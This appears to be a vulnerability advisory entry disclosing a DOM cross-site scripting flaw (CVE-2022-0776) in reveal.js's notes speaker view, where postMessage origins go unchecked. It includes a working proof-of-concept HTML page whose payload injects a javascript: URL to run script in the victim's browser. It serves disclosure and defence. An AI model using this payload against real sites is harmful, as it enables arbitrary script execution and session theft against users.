Lucene search
R0hanshBE2B7EE4-F487-42E1-874A-6BCC410E4001HistoryFeb 04, 2022 - 9:53 p.m.
Cross-site Scripting (XSS) - DOM in hakimel/reveal.js
2022-02-0421:53:13
r0hansh
www.huntr.dev
15
0.001 Low
EPSS
Percentile
41.7%
Description
The onmessage event listener in /plugin/notes/speaker-view.html does not check the origin of postMessage before adding the content to the webpage. The vulnerable code allows any origin to postMessage on the browser window and feeds attacker’s input to parts using which attacker can execute arbitrary javascript code on victim’s browser window hosting reveal.js
Video PoC: https://drive.google.com/file/d/1HVlEnmLJTjHJ5VGgz8CBdEXB7FXtomkv/view
Proof of Concept
STEP 1: Run npm start
STEP 2: Attacker hosts the following code on his website.
NOTE: Please change TARGET in the code
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Exploit reveal.js XSS</title>
</head>
<body>
<script type="text/javascript">
var TARGET = "http://localhost:8000/plugin/notes/speaker-view.html";
window.poc = window.open(TARGET);
var PAYLOAD = `{"namespace":"reveal-notes", "type": "connect", "url":"javascript:alert(document.domain)//", "state": {"indexh": "31337", "indexv": "31337"}}`;
setTimeout(function () {window.poc.postMessage(PAYLOAD,'*')},3000);
</script>
</body>
</html>
STEP 3: Victim visits attacker’s website and XSS pop-up will show domain name.
Impact
Attacker can execute arbitrary javascript code in the victim’s browser
Related
cve
cve
CVE-2022-0776
2022-03-01 09:15:07
veracode
veracode
Cross-site Scripting (XSS)
2022-03-02 04:02:53
nuclei
nuclei
RevealJS postMessage <4.3.0 - Cross-Site Scripting
2022-05-29 10:39:24
osv
osv
CVE-2022-0776
2022-03-01 09:15:07
Cross site scripting in reveal.js
2022-03-02 00:00:20
github
github
Cross site scripting in reveal.js
2022-03-02 00:00:20
cvelist
cvelist
CVE-2022-0776 Cross-site Scripting (XSS) - DOM in hakimel/reveal.js
2022-03-01 08:40:09
nvd
nvd
CVE-2022-0776
2022-03-01 09:15:07
prion
prion
Cross site scripting
2022-03-01 09:15:00